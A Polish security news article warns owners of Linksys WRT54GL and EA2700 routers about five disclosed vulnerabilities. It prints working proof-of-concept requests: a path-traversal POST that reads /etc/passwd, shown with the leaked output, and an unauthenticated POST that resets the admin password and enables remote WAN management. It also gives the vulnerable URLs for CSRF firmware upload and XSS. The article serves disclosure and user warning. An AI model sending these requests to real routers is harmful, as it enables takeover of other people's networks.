Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Uwaga na poważne luki w urządzeniach Linksys!
Niestety mamy kolejny dowód na to, że producenci urządzeń sieciowych klasy SOHO nie przywiązują zbyt dużej uwagi do bezpieczeństwa użytkowników swych produktów. Przed poważnymi podatnościami ostrzegamy dziś właścicieli popularnych modeli routerów Linksys.
Jeśli jesteś posiadaczem routerów Linksys WRT54GL lub EA2700, to Twoja domowa lub firmowa sieć może być poważnie zagrożona. Phil Perviance opublikował właśnie szczegóły pięciu występujących w tych urządzeniach podatności. Spójrzmy.
1. Linksys WRT54GL CSRF/CSFU
URL http://192.168.1.1/upgrade.cgi jest podatny na atak CSRF i pozwala na wykonanie ataku CSFU (ang. Cross-Site File Upload). W praktyce oznacza to potencjalną możliwość podmiany wewnętrznego oprogramowania (firmware) urządzenia i tym samym całkowite przejęcie kontroli nad jego działaniem.
2. Linksys EA2700 XSS
URL http://192.168.1.1/apply.cgi (parametr: submit_button) jest podatny na atak XSS, który zadziała również przy braku uwierzytelnienia. Potencjalne zastosowanie? Uzyskanie dostępu do urządzenia, modyfikacja konfiguracji, podmiana wewnętrznego oprogramowania.
3. Linksys EA2700 File Path Traversal Vulnerability
URL http://192.168.1.1/apply.cgi pozwala na uzyskanie dostępu do lokalnego systemu plików urządzenia. Przekazanie ścieżki do parametru „next_page” pozwala na uzyskanie dostępu do plików urządzenia, poniżej przykład dla pliku /etc/passwd.
POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin
4. Linksys EA2700 – modyfikacja hasła
Urządzenie jest na tyle „gościnne”, że każdemu znajdującemu się w tej samej sieci lub dowolnej odpowiednio spreparowanej witrynie internetowej pozwala na… zmianę hasła dostępowego oraz modyfikację konfiguracji. Po przesłaniu poniższego żądania POST hasło zostanie ustawione na „password”, a zdalna administracja (od strony WAN) zostanie włączona:
POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 370 submit_button=Management&change_action=&action=Apply&PasswdModify=1 &http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0 &wait_time=4&http_passwd=password&http_passwdConfirm=password &_http_enable=1&web_wl_filter=0 &remote_management=1&_remote_mgt_https=1&remote_ip_any=1 &http_wanport=8080&nf_alg_sip=0&ctf_enable=1&upnp_enable=1 &upnp_config=1&upnp_internet_dis=0
5. Linksys EA2700 Source Code Disclosure Vulnerability
Dodanie na końcu dowolnego URL (np. http://192.168.1.1/Management.asp/) znaku „/” pozwala na wyświetlenie kodów źródłowych aplikacji webowej routera. Interesujące.
Jeśli ktoś myśli, że odnalezienie urządzeń tego typu za pośrednictwem Internetu jest trudne, ten jest w błędzie. Przykładowo, za pomocą prostego zapytania skierowanego do Shodana, czyli wyszukiwarki urządzeń i serwerów sieciowych, odnajdziemy tysiące routerów.
Również przygotowanie własnej, dowolnie zmodyfikowanej wersji wewnętrznego oprogramowania routera nie jest wcale trudne. W tym celu można skorzystać z dostępnych narzędzi, takich jak:
Szczegółowe informacje o powyższych podatnościach zostały przesłane do producenta miesiąc temu. Niestety, jak do tej pory Phil nie doczekał się odpowiedzi. Tego typu podatności stanowią poważne zagrożenie, ponieważ mogą posłużyć potencjalnemu intruzowi do uzyskania oraz długoterminowego utrzymania (jak często sprawdzacie konfigurację własnego routera oraz wersję jego oprogramowania wewnętrznego?) kontroli nad naszą domową lub firmową siecią. Znane są również przypadki botnetów, które zamiast na komputerach, żerują właśnie na urządzeniach sieciowych klasy SOHO.
Biorąc pod uwagę powyższe podatności oraz reakcje (a raczej ich brak) producentów na zgłoszenia, bezpieczeństwo użytkowników nie jest dziś priorytetem dla firm produkujących domowe urządzenia sieciowe. Czy waszym zdaniem taki stan rzeczy w najbliższej przyszłości może ulec zmianie?
– Wojciech Smol, (wojciech.smol<at>sekurak.pl)